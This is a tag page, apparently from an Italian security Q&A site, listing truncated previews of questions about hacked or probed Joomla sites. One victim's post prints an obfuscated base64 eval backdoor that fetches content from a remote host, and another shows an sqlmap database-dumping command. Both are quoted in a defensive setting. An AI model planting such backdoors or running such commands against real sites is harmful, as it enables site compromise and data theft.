Domande con tag 'joomla'

domande con tag
2
risposte

Come proteggere i valori delle sessioni del negozio nelle applicazioni web?

EDIT: Ho cambiato il titolo di questo post da "Come gestire le sessioni in webapps?" a "Come proteggere i valori delle sessioni del negozio nelle applicazioni web?" come potrebbe essere fuorviante Negli ultimi mesi mi sono imbattuto in sc...
posta 07.09.2016 - 14:52
2
risposte

Il registro mostra molti successi ai contenuti non esistenti: hacking?

Ho un sito Web con Joomla e 404shSEF installati. Il componente registra tutte le 404 richieste e il registro è davvero interessante. Il sito sta ricevendo richieste sui componenti e anche un file chiamato questo: "7c334.php". Ecco un esempio:...
posta 18.05.2015 - 09:45
2
risposte

Hack: URL anymonous sul mio sito Joomla [Risolvi] [chiuso]

Il mio sito Web è stato violato di nuovo. Esistono molti URL stranieri come qui . Ho controllato il database e non c'è niente di strano nel mio database. Qualcuno sa che tipo di attacco hack è come questo? Quindi devo eseguire tutti i fil...
posta 11.03.2015 - 09:52
0
risposte

SQLMap Strange Dump Result

Usando SQLMap in questo modo: sqlmap -u "xxxxx" --dbms=MySql --dbs --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -D xxxxx -T "#__xxxxx" --columns Sto ottenendo questo avviso: [23:39:07] [WARNING] u...
posta 15.02.2017 - 20:07
5
risposte

Sito backdoor & eval ()

Gestisco un sito Joomla 1.7 che è stato hackerato oggi. Sotto lo script ha fatto il trucco. eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSF...
posta 21.02.2013 - 10:54
1
risposta

il mio sito con joomla 1.5.14 è stato deturpato e mi piacerebbe sapere come l'ha fatto e fermarlo

Dovrei gestire il contenuto di un sito e ne è stato deturpato. Il sito è ospitato su un server Linux con Apache. Versione di Apache: 2.2.13 La versione Linux è Debian 4.0 (penso di non avere accesso a qualcosa di più di un account ftp e phpmya...
posta 03.02.2013 - 15:26
1
risposta

Perché l'iniezione SQL basata su errori funziona solo con determinati campi?

Attualmente sto studiando l'ultima vulnerabilità che interessa il CMS di Joomla. Puoi trovare qui una descrizione della vulnerabilità , tuttavia la mia domanda riguarda solo iniezioni SQL basate su errori ed è indipendente dal contesto....
posta 28.10.2015 - 17:36
1
risposta

Installazione di Joomla con nessuno: nessun utente / gruppo (CentOS / cPanel)

Se stai installando Joomla tramite File Manager di cPanel sul tuo account (utente mywebsite) mywebsite.com, caricerai il pacchetto sul tuo server ed estrai l'archivio. Tutti i file avranno l'utente e il gruppo in base al tuo account miowebsit...
posta 01.12.2013 - 04:45
0
risposte

Come proibire gli hacker su un sito web Joomla? [chiuso]

Il mio sito Joomla è stato recentemente vittima di un attacco da parte di un hacker. Gli hacker hanno avuto accesso al mio server e hanno aggiunto alcuni file PHP e per lo più hanno modificato alcuni file index.php . Il codice è sfortunat...
posta 06.03.2018 - 18:29
0
risposte

Akamai o Incapsula (o altro) per CDN con protezione DDoS? [chiuso]

Uno dei nostri clienti sta lanciando un nuovo sito e ho avuto il compito di fare una breve panoramica dei vantaggi / svantaggi di Akamai, Incapsula o altri provider di CDN che sono forti con la protezione DDoS. Le nostre preoccupazioni princi...
posta 12.05.2014 - 14:26